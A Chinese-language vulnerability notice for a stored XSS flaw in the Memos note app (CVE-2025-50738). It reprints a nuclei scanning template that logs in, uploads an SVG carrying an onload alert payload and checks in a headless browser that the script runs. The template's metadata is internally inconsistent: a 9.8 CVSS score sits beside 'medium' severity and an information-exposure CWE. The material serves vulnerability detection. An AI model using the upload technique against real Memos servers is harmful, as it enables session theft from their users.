Memos Stored XSS via SVG File Upload Vulnerability

漏洞信息

漏洞名称: Memos Stored XSS via SVG File Upload Vulnerability

漏洞编号:

  • CVE: CVE-2025-50738

漏洞类型: 跨站可执行脚本

漏洞等级: 中危

漏洞描述: Memos是一款轻量级的笔记应用,允许用户记录和分享笔记。它通常被个人用户和小型团队用于日常的信息管理和协作。此次发现的存储型跨站脚本(XSS)漏洞影响了Memos 0.25.0之前的版本。漏洞的技术根源在于应用在处理上传的SVG文件时,未能充分验证和清理文件内容,导致恶意JavaScript代码可以被注入并存储在服务器上。当其他用户访问包含恶意SVG文件的页面时,注入的代码将在他们的浏览器中执行。这种漏洞可以被认证的攻击者利用,通过上传特制的SVG文件来实施攻击。由于攻击需要认证,这在一定程度上限制了漏洞的潜在影响,但一旦利用成功,攻击者可以窃取用户的会话令牌、重定向用户到恶意网站或在用户的上下文中执行其他恶意操作。因此,尽管漏洞的严重性被评级为中等,它仍然对使用受影响版本Memos的用户构成了显著的安全风险。

产品厂商: usememos

产品名称: Memos

影响版本: < 0.25.0

来源: https://github.com/projectdiscovery/nuclei-templates/blob/98272924cf26e7491833caa46303926dddc70fe7/headless%2Fcves%2F2025%2FCVE-2025-50738.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83

id: CVE-2025-50738

info:
  name: Memos < 0.25.0 - Stored XSS via SVG File Upload (Fixed Matcher)
  author: (SeongHyeon Jeon)nukunga
  severity: medium
  description: |
    An authenticated attacker can upload a specially crafted SVG file containing JavaScript code to Memos versions prior to 0.25.0, leading to a stored cross-site scripting (XSS) vulnerability.
  reference:
    - https://github.com/usememos/memos/issues/4707
    - https://github.com/advisories/GHSA-hfcf-79gh-f3jc
    - https://nvd.nist.gov/vuln/detail/CVE-2025-50738
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 9.8
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 2
  tags: xss,stored-xss,memos,authenticated,ghsa,intrusive,headless

variables:
  username: "{{username}}"
  password: "{{password}}"
  filename: "{{rand_base(8)}}"

http:
  - raw:
      - |
        POST /api/v1/auth/signin?username={{username}}&password={{password}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {}
    extractors:
      - type: regex
        part: header
        name: access_token
        internal: true
        group: 1
        regex:
          - 'memos\.access-token=([^;]+);'

  - method: POST
    path:
      - "{{BaseURL}}/api/v1/resources"
    headers:
      Cookie: "memos.access-token={{access_token}}"
      Content-Type: "application/json"
    body: |
      {
        "filename": "{{filename}}.svg",
        "content": "PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIG9ubG9hZD0iYWxlcnQoMSkiPjwvc3ZnPg==",
        "type": "image/svg+xml"
      }

    extractors:
      - type: regex
        name: resource_id
        internal: true
        part: body
        group: 1
        regex:
          - '"name":"resources/([A-Za-z0-9]+)"'

headless:
  - steps:
      - action: navigate
        args:
          url: "{{BaseURL}}/file/resources/{{resource_id}}/{{filename}}.svg"

      - action: waitdialog
        name: xss_alert

    matchers:
      - type: dsl
        dsl:
          - xss_alert == true
          - xss_alert_message == "1"
          - xss_alert_type == "alert"
        condition: and

Github Poc
#projectdiscovery/nuclei-templates:github issues #跨站可执行脚本
Memos Stored XSS via SVG File Upload Vulnerability
http://example.com/2025/08/03/github_2771826056/
作者
lianccc
发布于
2025年8月3日
许可协议